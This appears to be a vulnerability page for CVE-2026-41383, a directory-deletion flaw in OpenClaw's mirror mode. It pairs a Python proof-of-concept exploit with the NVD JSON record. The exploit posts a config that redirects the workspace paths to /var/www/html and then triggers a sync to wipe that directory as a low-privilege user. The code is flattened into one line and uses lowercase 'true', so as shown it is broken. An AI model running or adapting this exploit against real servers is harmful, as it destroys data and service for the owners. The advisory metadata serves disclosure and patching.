CVE-2026-41383

import requests import json # Exploit Title: OpenClaw Arbitrary Directory Deletion PoC # Description: Manipulates remoteWorkspaceDir to delete a target directory on the server. TARGET_URL = "http://vulnerable-openclaw-instance:8080/api/config" SESSION_COOKIE = "session_id_of_low_priv_user" # The directory on the remote server the attacker wants to delete MALICIOUS_TARGET_DIR = "/var/www/html" # Payload to manipulate configuration payload = { "remoteWorkspaceDir": MALICIOUS_TARGET_DIR, "remoteAgentWorkspaceDir": MALICIOUS_TARGET_DIR, "mirrorMode": true, "forceSync": true } headers = { "Cookie": f"session={SESSION_COOKIE}", "Content-Type": "application/json" } try: # Step 1: Update the configuration to point to the sensitive directory print(f"[*] Attempting to update remoteWorkspaceDir to: {MALICIOUS_TARGET_DIR}") response = requests.post(TARGET_URL, headers=headers, data=json.dumps(payload)) if response.status_code == 200: print("[+] Configuration updated successfully.") print("[+] Triggering sync operation...") # Step 2: Trigger the mirror sync (this might happen automatically or via a specific endpoint) sync_url = TARGET_URL.replace("/config", "/sync") sync_resp = requests.post(sync_url, headers=headers) if sync_resp.status_code == 200: print(f"[!] Exploit successful. Directory {MALICIOUS_TARGET_DIR} should be deleted/replaced.") else: print("[-] Failed to trigger sync.") else: print(f"[-] Failed to update configuration. Status: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

{"cve": {"id": "CVE-2026-41383", "sourceIdentifier": "[email protected]", "published": "2026-04-28T19:37:41.360", "lastModified": "2026-05-01T15:52:02.923", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw before 2026.4.2 contains an arbitrary directory deletion vulnerability in mirror mode that allows attackers to delete remote directories by influencing remoteWorkspaceDir and remoteAgentWorkspaceDir configuration values. Attackers can manipulate these OpenShell config paths to cause mirror sync operations to delete unintended remote directory contents and replace them with uploaded workspace data."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.4.2", "matchCriteriaId": "9E93D9F1-C6FA-4AEE-AC8B-27CDEE77637C"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/b21c9840c2e38f4bb338d031511b479d5f07ca25", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-m34q-h93w-vg5x", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-remote-directory-deletion-via-mis-scoped-mirror-mode-paths", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}